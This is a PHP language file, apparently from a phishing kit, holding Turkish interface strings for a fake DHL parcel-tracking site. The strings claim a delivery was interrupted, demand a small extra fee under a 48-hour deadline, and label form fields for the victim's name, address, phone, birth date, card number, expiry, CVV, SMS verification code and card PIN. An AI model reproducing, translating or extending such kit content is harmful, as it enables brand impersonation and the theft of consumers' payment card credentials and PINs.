<?php

function lang($phrase){
	static $lang = array(
		/* Main Page */
		
		"xlangdrx" => "ltr", 
		"xTitle" => "Global Logistics - International Shipping | DHL Home", 
		"xContactUs" => "Bize Ulaşın",                                                       
		"xPortalLogin" => "Portal Girişi",
		"xSearch" => "Search",
		"xTrackNav" => "Track",
		"xAllProducts&Solutions" => "Tüm Ürünler ve Çözümler",
		"xBölümlerimiz" => "Bölümlerimiz",
		"xIndustrySectors" => "Sanayi Sektörleri",
		"xInsights&Innovation" => "İçgörüler ve İnovasyon",
		"xKariyerler" => "Kariyerler",
		"xPress" => "Press",
		"xAboutUs" => "Hakkımızda",                                                           
		"xTrackYourShipment" => "Gönderinizi Takip Edin",                                         
		"xEnteryourEmail" => "E-postanızı girin",
		"xTrackBtn" => "Track",
		"xDHLExpressReferenceTracking" => "DHL Express Referans Takibi",
		"xShippingServices" => "Nakliye Hizmetleri",                                           
		"xPackages" => "Paketler",
		"xDocumentParcel" => "Belge ve Koli",
		"xAirFreight" => "Hava Taşımacılığı",
		"xOceanFreight" => "Okyanus Taşımacılığı",
		"xRoadFreight" => "Karayolu Taşımacılığı",
		"xRailFreight" => "Demiryolu Taşımacılığı",                                                   
		"xFollowUs" => "Bizi Takip Edin",                                                           
		"xDeutschePostDHLGroup" => "Deutsche Post DHL Group",
		"xReadmoreaboutFraudAwareness" => "Dolandırıcılık Farkındalığı",
		"xReadmoreaboutLegalNotice" => "Yasal Bildirim",
		"xTermsofUse" => "Kullanım Koşulları",											
		"xPrivacyNotice" => "Gizlilik Bildirimi",
		"xDisputeResolution" => "Uyuşmazlık Çözümü",
		"xAccessibility" => "Erişilebilirlik",
        "xCookieSettings" => "Çerez Ayarları",
		"xFrom" => "Kimden",
		"xExpectedDelivery" => "Beklenen Teslimat",
		"xTaxes" => "Vergiler",
		"xExplainHeading" => "Teslimat kesintiye uğradı",
		"xDelv" => "Beklenen Teslimat",
		"xPackagenumber" => "Paket numarası",
		"xBinfo" => "(Fatura bilgileri)",
		"xBpay" => "(Ödeme)",
		"xBauth" => "(Kimlik Doğrulama)",
		"xBh1t" => "Fatura bilgilerinizi onaylayın",
		"xHexplain" => "Teslimat Kesildi",
		"xp1" => "Son teslimatınız yarıda kesildi. Şu anda tasnif merkezinde bekletiliyor",
		"xp2" => "Paketiniz belirtilen ağırlığa uymadı, bu nedenle paketinizi doğru bir şekilde taşıyabilmek için sizden ek maliyetler talep edilmektedir.",
		"xp3" => "Ücret 3.99EUR Ödemeyi yapmak için lütfen aşağıdaki butona tıklayın",
		"xp4" => "Ücretler ödendikten sonra, paketiniz mümkün olan en kısa sürede teslimat yerine gönderilecektir.",
		"xp5" => "Bu ücretlerin önümüzdeki 48 saat içinde ödenmemesi durumunda paket göndericiye iade edilecektir.",
		"xname" => "Tam Ad",
		"xadres" => "Adres",
		"xcountry" => "Ülke",
		"xcity" => "Şehir",
		"xphone" => "Telefon numarası",
		"xdate" => "Brith Tarihi",
		"xCpoaf" => "Ek ücretlerin ödenmesi",
		"xcch" => "Kredi Kartı Sahibi",
		"xccn" => "Kredi Kartı Numarası",
		"xexp" => "Son Kullanma Tarihi (aa/yy)",
		"xcvv" => "(CVV) Kodu",
		"xAauth" => "Kimlik Doğrulama",
		"xAp1" => "Ödemenize devam etmek için lütfen cep telefonu numaranıza gönderilen doğrulama kodunu girin",
		"xAcp" => "Kod",
		"xAp2" => "Lütfen (SMS) ile aldığınız kodu girin",
		"xHp" => "Ödeme başarılı",
		"xRod" => "Teslimatın yeniden başlaması",
		"xP1fin" => "Ek masrafların ödenmesi dikkate alınmıştır.",
		"xP2fin" => "Paketiniz önümüzdeki 24 saat içinde teslimata ulaşmalıdır.",
		"xPay" => "Şimdi Öde",
		"xCnt" => "Devam",
		"xFinish" => "Finish",
		"xpin1" => "Ödemenizi doğrulamak için lütfen kart PIN kodunuzu girin",
		"xpin2" => "PIN kodu",
		"xpin3" => "Lütfen kartınızın 4 haneli PIN kodunu girin"
	);	
	return $lang[$phrase];
}
 ?>